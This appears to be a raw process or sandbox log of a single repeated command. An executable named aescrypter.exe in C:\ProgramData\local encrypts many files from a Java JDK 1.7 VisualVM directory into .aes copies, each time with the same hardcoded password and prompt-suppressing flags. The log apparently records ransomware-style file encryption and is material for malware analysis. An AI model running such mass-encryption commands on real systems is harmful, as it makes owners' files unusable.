"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
